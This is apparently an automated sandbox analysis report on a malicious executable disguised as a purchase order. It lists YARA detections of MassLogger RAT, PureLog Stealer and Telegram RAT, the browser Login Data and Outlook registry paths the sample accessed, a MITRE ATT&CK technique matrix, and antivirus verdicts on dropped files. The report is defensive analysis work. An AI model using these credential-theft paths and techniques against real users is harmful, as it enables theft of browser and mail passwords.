Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_0045091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

0_2_0045091D

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_0047B340 GetUserNameW,

0_2_0047B340

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_00431E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00431E8E

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_0041DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0041DDC0

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 13.2.RegSvcs.exe.3d24dc0.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d54e10.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d54e10.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.server01.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d3cdf0.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d24dc0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server01.exe PID: 4324, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: 13.2.RegSvcs.exe.2751e9e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2751e9e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3c95570.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2a50000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2752d86.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3c96458.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2b90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2a50ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3c96458.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3ccfd90.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2b90000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3ccfd90.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2a50000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2a50ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2752d86.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3c95570.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2136041654.0000000002711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2137004258.0000000002A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2139311354.0000000003C95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2137350892.0000000002B90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 13.2.RegSvcs.exe.3d24dc0.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d54e10.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d54e10.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.server01.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d3cdf0.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d24dc0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server01.exe PID: 4324, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\server01.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\server01.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\server01.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: PO #09465610_GQ 003745_SO-242000846.exe	Binary or memory string: WIN_81
Source: PO #09465610_GQ 003745_SO-242000846.exe	Binary or memory string: WIN_XP
Source: PO #09465610_GQ 003745_SO-242000846.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: PO #09465610_GQ 003745_SO-242000846.exe	Binary or memory string: WIN_XPe
Source: PO #09465610_GQ 003745_SO-242000846.exe	Binary or memory string: WIN_VISTA
Source: PO #09465610_GQ 003745_SO-242000846.exe	Binary or memory string: WIN_7
Source: PO #09465610_GQ 003745_SO-242000846.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 13.2.RegSvcs.exe.3d24dc0.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d54e10.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d54e10.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.server01.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d3cdf0.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d24dc0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3330930022.0000000003263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server01.exe PID: 4324, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 13.2.RegSvcs.exe.3d24dc0.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d54e10.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d54e10.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.server01.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d3cdf0.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d24dc0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server01.exe PID: 4324, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: 13.2.RegSvcs.exe.2751e9e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2751e9e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3c95570.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2a50000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2752d86.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3c96458.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2b90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2a50ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3c96458.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3ccfd90.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2b90000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3ccfd90.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2a50000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2a50ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2752d86.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3c95570.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2136041654.0000000002711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2137004258.0000000002A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2139311354.0000000003C95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2137350892.0000000002B90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 13.2.RegSvcs.exe.3d24dc0.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d54e10.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d54e10.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.server01.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d3cdf0.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.3d24dc0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server01.exe PID: 4324, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00458C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00458C4F
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0045923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_0045923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	4 Native API	111 Scripting	1 Exploitation for Privilege Escalation	111 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	2 LSASS Driver	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	1 DLL Side-Loading	2 LSASS Driver	1 Abuse Elevation Control Mechanism	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Valid Accounts	1 DLL Side-Loading	4 Obfuscated Files or Information	NTDS	137 System Information Discovery	Distributed Component Object Model	21 Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Windows Service	2 Valid Accounts	1 Direct Volume Access	LSA Secrets	1 Query Registry	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	1 Scheduled Task/Job	21 Access Token Manipulation	1 Software Packing	Cached Domain Credentials	341 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	2 Registry Run Keys / Startup Folder	1 Windows Service	1 Timestomp	DCSync	31 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	212 Process Injection	1 DLL Side-Loading	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	1 Scheduled Task/Job	222 Masquerading	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	2 Registry Run Keys / Startup Folder	2 Valid Accounts	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	31 Virtualization/Sandbox Evasion	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	21 Access Token Manipulation	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	212 Process Injection	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO #09465610_GQ 003745_SO-242000846.exe	100%	Avira	W32/Infector.Gen
PO #09465610_GQ 003745_SO-242000846.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\AutoIt3\Au3Check.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Check.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	Joe Sandbox ML
